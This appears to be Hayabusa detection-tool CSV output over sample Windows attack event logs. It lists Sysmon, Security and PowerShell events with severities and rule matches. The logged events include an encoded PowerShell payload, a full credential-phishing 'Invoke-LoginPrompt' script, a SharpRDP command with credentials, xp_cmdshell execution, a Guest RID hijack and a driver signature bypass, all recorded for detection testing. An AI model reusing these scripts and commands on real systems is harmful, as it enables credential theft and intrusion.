+2019-09-03 11:05:22.837 +00:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () | Dst: 10.0.2.15:137 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 11:33:24.177 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49949 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 8892 | PGUID: 747F3D96-4F81-5D6E-0000-001001818B00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 11:33:24.177 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (MSEDGEWIN10) | Dst: 127.0.0.1:49949 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 11:34:37.129 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49950 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 8892 | PGUID: 747F3D96-4F81-5D6E-0000-001001818B00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 11:34:37.129 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (MSEDGEWIN10) | Dst: 127.0.0.1:49950 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 11:36:26.005 +00:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.15:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 11:36:26.005 +00:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () | Dst: 10.0.2.15:137 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-06 13:49:35.433 +00:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,CredAccess - Keko default np | Pipe: \kekeo_tsssp_endpoint | Process: c:\Users\IEUser\Desktop\kekeo.exe | PID: 6908 | PGUID: 747F3D96-393E-5D72-0000-0010AD443200,rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx +2019-09-06 13:49:39.823 +00:00,MSEDGEWIN10,18,medium,,Pipe Connected_Sysmon Alert,CredAccess - Keko default np | Pipe: \kekeo_tsssp_endpoint | Process: C:\Users\IEUser\Desktop\kekeo.exe | PID: 7808 | PGUID: 747F3D96-3944-5D72-0000-001019773200,rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx +2019-09-06 14:58:44.918 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 3128 | PGUID: 747F3D96-7424-5D72-0000-0010BEFBBC00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx +2019-09-08 19:14:54.471 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Guest RID Hijack | SetValue: HKLM\SAM\SAM\Domains\Account\Users\000001F5\F: Binary Data | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | PID: 7680 | PGUID: 747F3D96-067D-5D75-0000-001007745500,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx +2019-09-09 13:35:08.655 +00:00,MSEDGEWIN10,4104,medium,,Potentially Malicious PwSh,"&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAAlVdl0CA81UXW/aMBR996+4svJANJIfgNQHBNs6aaWIsO2hnSbXuaVeEzuyHdKI8d93YwIDTUJlfVkeLPme+3F87lEeay29Mho+6bV5xuSzWSk9t6as/IZF0mIOVxBdG+fTWqU74IOxEwJQeyWKAf+mdG4aBxnK2irf8iHweYHCIVAKWqgdHfJQ4bqECPV61AG5KYXS94e7FiXyIecxi/ZXYsBPcRbtyk6QXYiwx7ooAtJH4B3w+3BGRx0q4VxjbHhfRy79iH6GnkLPR6+L030eG+d5smwrhIQiWD4UbSCXtc5jmU6VRemNbTO0ayXRpWMpTa39jdBihSX1Y9E0o2kzbJLbh5+UfUEtSa+0VJUoJoZEffGDuwuK+5qO/ffR6EbIJ6UxZs2TKnBArNKvolC58Pjn5W7Ag5C0i4NUPIZEI0RLW2O8YUDfv1uEDNcNhaORQ+h9420LYtXt7nVWCUzO2CXgZywT8FfZJmRebJ2u6u32CbP/Mwv1nM4aCE4c9AtM7RNNSCjeMogoUNW+U1NjszfUGWGph8OCKCdmJ8IX2s+M1BzCNOyOjHSQvu/OYLHJluPF8sd8cTt5n2VbtmV///R+A6HMO3IQBQAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx +2019-09-09 13:35:08.655 +00:00,MSEDGEWIN10,4104,info,,PwSh Scriptblock Log,"&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAAlVdl0CA81UXW/aMBR996+4svJANJIfgNQHBNs6aaWIsO2hnSbXuaVeEzuyHdKI8d93YwIDTUJlfVkeLPme+3F87lEeay29Mho+6bV5xuSzWSk9t6as/IZF0mIOVxBdG+fTWqU74IOxEwJQeyWKAf+mdG4aBxnK2irf8iHweYHCIVAKWqgdHfJQ4bqECPV61AG5KYXS94e7FiXyIecxi/ZXYsBPcRbtyk6QXYiwx7ooAtJH4B3w+3BGRx0q4VxjbHhfRy79iH6GnkLPR6+L030eG+d5smwrhIQiWD4UbSCXtc5jmU6VRemNbTO0ayXRpWMpTa39jdBihSX1Y9E0o2kzbJLbh5+UfUEtSa+0VJUoJoZEffGDuwuK+5qO/ffR6EbIJ6UxZs2TKnBArNKvolC58Pjn5W7Ag5C0i4NUPIZEI0RLW2O8YUDfv1uEDNcNhaORQ+h9420LYtXt7nVWCUzO2CXgZywT8FfZJmRebJ2u6u32CbP/Mwv1nM4aCE4c9AtM7RNNSCjeMogoUNW+U1NjszfUGWGph8OCKCdmJ8IX2s+M1BzCNOyOjHSQvu/OYLHJluPF8sd8cTt5n2VbtmV///R+A6HMO3IQBQAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx +2019-09-09 13:35:09.315 +00:00,MSEDGEWIN10,4104,medium,,Potentially Malicious PwSh,"function Invoke-LoginPrompt{ $cred = $Host.ui.PromptForCredential(""Windows Security"", ""Please enter user credentials"", ""$env:userdomain\$env:username"","""") $username = ""$env:username"" $domain = ""$env:userdomain"" $full = ""$domain"" + ""\"" + ""$username"" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) while($DS.ValidateCredentials(""$full"",""$password"") -ne $True){ $cred = $Host.ui.PromptForCredential(""Windows Security"", ""Invalid Credentials, Please try again"", ""$env:userdomain\$env:username"","""") $username = ""$env:username"" $domain = ""$env:userdomain"" $full = ""$domain"" + ""\"" + ""$username"" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) $DS.ValidateCredentials(""$full"", ""$password"") | out-null } $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password $output R{START_PROCESS} } Invoke-LoginPrompt",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx +2019-09-09 13:35:09.315 +00:00,MSEDGEWIN10,4104,info,,PwSh Scriptblock Log,"function Invoke-LoginPrompt{ $cred = $Host.ui.PromptForCredential(""Windows Security"", ""Please enter user credentials"", ""$env:userdomain\$env:username"","""") $username = ""$env:username"" $domain = ""$env:userdomain"" $full = ""$domain"" + ""\"" + ""$username"" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) while($DS.ValidateCredentials(""$full"",""$password"") -ne $True){ $cred = $Host.ui.PromptForCredential(""Windows Security"", ""Invalid Credentials, Please try again"", ""$env:userdomain\$env:username"","""") $username = ""$env:username"" $domain = ""$env:userdomain"" $full = ""$domain"" + ""\"" + ""$username"" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) $DS.ValidateCredentials(""$full"", ""$password"") | out-null } $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password $output R{START_PROCESS} } Invoke-LoginPrompt",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx +2019-09-09 13:35:09.315 +00:00,MSEDGEWIN10,4104,high,CredAccess | Exec,PowerShell Credential Prompt,,rules/sigma/powershell/powershell_script/posh_ps_prompt_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx +2019-09-09 13:35:09.315 +00:00,MSEDGEWIN10,4104,medium,Persis,Manipulation of User Computer or Group Security Principals Across AD,,rules/sigma/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx +2019-09-09 13:35:09.315 +00:00,MSEDGEWIN10,4104,low,Disc,Suspicious PowerShell Get Current User,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_get_current_user.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx +2019-09-22 11:22:05.201 +00:00,MSEDGEWIN10,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-3461203602-4096304019-2269080069-501 | Group: Administrators | LID: 0x27a10f,rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx +2019-09-22 11:23:19.251 +00:00,MSEDGEWIN10,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-20 | Group: Administrators | LID: 0x27a10f,rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx +2019-11-03 13:51:58.263 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c set > c:\users\\public\netstat.txt | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\sqlsvc | Parent Cmd: ""c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe"" -sSQLEXPRESS | LID: 0x1d51e | PID: 5004 | PGUID: 747F3D96-DB7C-5DBE-0000-0010CF6B9502",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-03 13:51:58.263 +00:00,MSEDGEWIN10,1,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-03 13:51:58.263 +00:00,MSEDGEWIN10,1,low,Evas,Cmd Stream Redirection,,rules/sigma/process_creation_sysmon/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-03 13:51:58.263 +00:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-03 13:51:58.263 +00:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-15 08:19:02.298 +00:00,alice.insecurebank.local,1102,high,Evas,Security Log Cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx +2019-11-15 08:19:17.134 +00:00,alice.insecurebank.local,4634,info,,Logoff,User: ANONYMOUS LOGON | LID: 0x1d12916,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx +2020-01-14 20:44:50.353 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 url.dll,FileProtocolHandler ms-browser:// | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7a3aff | PID: 4180 | PGUID: 747F3D96-2842-5E1E-0000-00100C417A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:44:50.353 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:44:50.353 +00:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:44:51.016 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 url.dll,FileProtocolHandler ms-browser:// | LID: 0x7a3aff | PID: 1568 | PGUID: 747F3D96-2842-5E1E-0000-0010745E7A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:44:51.122 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7a3aff | PID: 676 | PGUID: 747F3D96-2843-5E1E-0000-0010B1687A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:46:43.237 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 url.dll,OpenURL ms-browser:// | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7beb57 | PID: 3412 | PGUID: 747F3D96-28B3-5E1E-0000-00101DF17B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:46:43.237 +00:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:46:43.237 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:46:43.819 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 url.dll,OpenURL ms-browser:// | LID: 0x7beb57 | PID: 1656 | PGUID: 747F3D96-28B3-5E1E-0000-001032047C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:46:43.836 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7beb57 | PID: 2964 | PGUID: 747F3D96-28B3-5E1E-0000-0010900A7C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:48:17.044 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /c start ms-browser:// | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7cef82 | PID: 4448 | PGUID: 747F3D96-2910-5E1E-0000-001053F57C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:48:17.044 +00:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:48:17.412 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c start ms-browser:// | LID: 0x7cef82 | PID: 2416 | PGUID: 747F3D96-2911-5E1E-0000-0010D80A7D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:48:17.447 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7cef82 | PID: 1344 | PGUID: 747F3D96-2911-5E1E-0000-00109C137D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:48:45.243 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: explorer ms-browser:// | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7d58cd | PID: 3828 | PGUID: 747F3D96-292D-5E1E-0000-0010F5597D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:48:45.243 +00:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:48:45.293 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x565a6 | PID: 6020 | PGUID: 747F3D96-292D-5E1E-0000-001025607D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-23 19:09:34.052 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: SharpRDP.exe computername=192.168.56.1 command=""C:\Temp\file.exe"" username=domain\user password=password | Process: C:\ProgramData\USOShared\SharpRDP.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0xd50da8 | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx +2020-01-23 19:09:34.657 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\ProgramData\USOShared\AxInterop.MSTSCLib.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: SHA1=7E613165F4E4696AB13D8D5F3F889131EBC186E0,MD5=A482BE452F384E446FD9F3A91986FCD4,SHA256=9DDAE70F550B452ABE3C75A6036845ABD4134F858C1DEC3343762D97A9CF8450,IMPHASH=DAE02F32A21E03CE65412F6E56942DAA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx +2020-01-23 19:09:34.657 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\ProgramData\USOShared\AxInterop.MSTSCLib.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: SHA1=7E613165F4E4696AB13D8D5F3F889131EBC186E0,MD5=A482BE452F384E446FD9F3A91986FCD4,SHA256=9DDAE70F550B452ABE3C75A6036845ABD4134F858C1DEC3343762D97A9CF8450,IMPHASH=DAE02F32A21E03CE65412F6E56942DAA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx +2020-01-23 19:09:34.660 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"LM - suspicious RDP Client | Image: C:\Windows\SysWOW64\mstscax.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: SHA1=359B2E4C537B00DD450D1E7B3465EE1BA094E8D6,MD5=654534BAC7465961F302C7A990DFDC8D,SHA256=D9827ABED81572C296BB6A63863515BA7B9EB1C8164A4E92A97E1FF0BD04AAB1,IMPHASH=1EA1D2F3BE5D1C352344C4CBF6A7614C",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx +2020-02-10 08:28:12.856 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: Furutaka.exe dummy2.sys | Process: C:\Users\Public\BYOV\TDL\Furutaka.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x31a17 | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00 | Hash: SHA1=68B26C16080D71013123C6DEE7B1AABC3D2857D0,MD5=B1B981CD8B111783B80F3C4E10086912,SHA256=37805CC7AE226647753ACA1A32D7106D804556A98E1A21AC324E5B880B9A04DA,IMPHASH=114E27FBB0E975697F2F9988DE884FA7",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 08:28:12.856 +00:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 08:28:12.876 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\drivers\VBoxDrv.sys | Process: c:\Users\Public\BYOV\TDL\Furutaka.exe | PID: 3768 | PGUID: 